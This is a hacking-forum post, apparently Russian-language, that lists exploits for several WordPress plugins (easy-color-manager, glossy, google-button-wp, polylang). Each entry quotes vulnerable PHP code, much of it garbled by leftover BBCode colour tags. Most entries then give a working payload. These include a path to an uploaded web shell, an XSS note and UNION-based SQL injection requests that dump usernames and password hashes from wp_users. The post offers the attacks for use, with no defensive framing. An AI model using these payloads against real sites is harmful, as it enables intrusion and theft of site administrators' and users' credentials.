|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
easy-color-manager #plugin# shell upload
easy-color-manager.php
PHP код:
[COLOR="#000000"]...
[COLOR="#0000BB"]
[/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"]) as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]){
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]] ===[/COLOR][COLOR="#DD0000"]'navigation-02'[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' 背景'[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' パネル'[/COLOR][COLOR="#007700"];
} else {
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]background_part_array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] ;
}
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[COLOR="#0000BB"]
[/COLOR][/COLOR]" />
表示方法の設定は「背景画像オプション」、削除は「サイトの詳細設定」でおこなってください。
...[/COLOR]
shell:
Код:
http://wp/wp-content/plugins/easycolmanager/uploads/shell.php
glossy #plugin# sql-inj
glossy.admin.addEntry.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_name'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryTitle[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_title'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryLink[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_link'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryDimensions[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_dimensions'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$entryContents[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gs_entry_contents'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$saveEntry[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]gs_save_entry[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryTitle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryLink[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryDimensions[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryContents[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pageAction[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryOriginalName[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// If $saveEntry is empty (no errors) and we've been adding, switch to editing mode
[/COLOR][COLOR="#007700"]if (empty([/COLOR][COLOR="#0000BB"]$saveEntry[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$completedAction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$pageAction[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$pageAction[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Edit"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$entryOriginalName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"];
}
...[/COLOR][/COLOR]
glossy.admin.addEntry.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
} else if ([/COLOR][COLOR="#0000BB"]$entryAction[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"Add"[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$entryOriginalName[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]prepare[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT gs_name FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$gs_tableName[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE gs_name = '%s';"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$entryName[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$existingName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$existingName[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$saveData[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$errorFields[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'entryName'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'taken'[/COLOR][COLOR="#007700"];
}
}
...[/COLOR][/COLOR]
exploit:
Код:
POST: wp-content/plugins/glossy/glossy.admin.addEntry.php
data: gs_entry_title=&gs_entry_link=&gs_entry_dimensions=&gs_entry_contents=&gs_entry_name=aaa+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+
google-button-wp #plugin# passive XSS
google.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#DD0000"]'.__("General options", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Active share buttons", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]';
foreach ($active_buttons as $name => $text) {
$checked = ($option['[/COLOR][COLOR="#0000BB"]active_buttons[/COLOR][COLOR="#DD0000"]'][$name]) ? '[/COLOR][COLOR="#0000BB"]checked[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"checked"' : '';
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'
. __($text, '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#DD0000"]';
}
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Show buttons in these pages", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]';
foreach ($show_in as $name => $text) {
$checked = ($option['[/COLOR][COLOR="#0000BB"]show_in[/COLOR][COLOR="#DD0000"]'][$name]) ? '[/COLOR][COLOR="#0000BB"]checked[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"checked"' : '';
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'
. __($text, '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];&[/COLOR][COLOR="#0000BB"]nbsp[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#DD0000"]';
}
$out .= '[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Position", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]before the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]after the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__('[/COLOR][COLOR="#0000BB"]before[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]after the post[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Google +1 options", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Button width", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]px[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("default: 90", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#DD0000"]'.__("Show counter", '[/COLOR][COLOR="#0000BB"]menu[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]test[/COLOR][COLOR="#DD0000"]' ).'[/COLOR][COLOR="#007700"]:
...[/COLOR][/COLOR]
Vurnel input name "px" ex:alert()
polylang #plugin# double sql-inj
languages-form.php
PHP код:
[COLOR="#000000"]...
[COLOR="#0000BB"]
[/COLOR]
[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" />[COLOR="#0000BB"]
[/COLOR] [COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" aria-required="true" />
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]description[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" aria-required="true" />
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]?>[/COLOR]" size="40" />
[COLOR="#0000BB"][/COLOR]
...[/COLOR]
admin.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#FF8000"]// Update links to this language in posts and terms in case the slug has been modified
[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_language[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$old_slug[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$old_slug[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'slug'[/COLOR][COLOR="#007700"]]) {
[/COLOR][COLOR="#FF8000"]// update the language slug in posts meta
[/COLOR][COLOR="#007700"]...[/COLOR][/COLOR]
exploit #1:
Код:
POST: wp-contents/plugins/polylang/admin.php
data: lang=albanskiy&slug=newnew&set=1+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+&time=now
uninstall.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$languages[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_terms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'hide_empty'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]));
foreach ([/COLOR][COLOR="#0000BB"]$languages[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]// delete references to this language in all posts
[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]'numberposts'[/COLOR][COLOR="#007700"]=> -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'post_type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'any'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'post_status'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'any'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$posts[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_posts[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]);
foreach ([/COLOR][COLOR="#0000BB"]$posts[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]delete_post_meta[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ID[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_lang-'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// delete references to this language in categories & post tags
[/COLOR][COLOR="#0000BB"]$terms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_terms[/COLOR][COLOR="#007700"](array([/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'post_tag'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'get=all'[/COLOR][COLOR="#007700"]);
foreach ([/COLOR][COLOR="#0000BB"]$terms[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$term[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]delete_metadata[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'term'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$term[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_language'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]delete_metadata[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'term'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$term[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_lang-'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]slug[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// finally delete the language itself
[/COLOR][COLOR="#0000BB"]wp_delete_term[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]term_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]// delete the termmeta table only if it is empty as other plugins may use it
[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]termmeta[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) FROM[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"]WHERE poly_id=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id']"[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DROP TABLE[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"];"[/COLOR][COLOR="#007700"]);
unset([/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]termmeta[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
exploit #2:
Код:
http://wp/wp-contents/plugins/polylang/uninstall.php?id=-666666666+union+select+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+from+wp_users+--
|